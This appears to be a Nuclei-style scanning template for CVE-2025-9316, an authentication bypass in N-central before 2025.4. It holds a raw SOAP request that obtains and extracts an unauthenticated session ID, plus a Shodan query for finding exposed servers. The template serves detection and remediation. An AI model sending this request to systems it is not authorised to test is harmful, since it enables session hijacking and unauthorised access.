Vulnerability Description
N-central < 2025.4 can generate sessionIDs for unauthenticated users. This issue affects N-central: before 2025.4.
id: CVE-2025-9316

info:
  name: N-central - Authentication Bypass
  author: DhiyaneshDK,horizon3ai
  severity: medium
  description: |
    N-central < 2025.4 can generate sessionIDs for unauthenticated users This issue affects N-central: before 2025.4.
  impact: |
    Attackers can hijack sessions without authentication, potentially leading to unauthorized access.
  remediation: |
    Update to version 2025.4 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-9316
    - https://github.com/horizon3ai/n-able_n-central_xxe_file_read/blob/main/ncentral_xxe_file_read.py
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.title:"N-central Login"
  tags: cve,cve2025,n-central,session-leak

http:
  - raw:
      - |
        POST /dms/services/ServerUI HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml
        Soapaction: ""

        <?xml version="1.0" encoding="UTF-8"?>
        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
          <soapenv:Body>
            <sessionHello>
              <applianceID>3</applianceID>
            </sessionHello>
          </soapenv:Body>
        </soapenv:Envelope>

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "SessionID"
          - "sessionHelloResponse"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '<SessionID[^>]*>(\d+)</SessionID>'
          - '<sessionId>(\d+)</sessionId>'
          - '<sessionID>(\d+)</sessionID>'
# digest: 4a0a00473045022067704f86d667e23e14b2b01e75851b79e4d37db7f2cc4341061c7dcc303de4a2022100df8e5c3cf5ee51acbcd927722d83ead1e3b6796604d342a80c53e734abe96dff:922c64590222798bb761d5b6d8e72950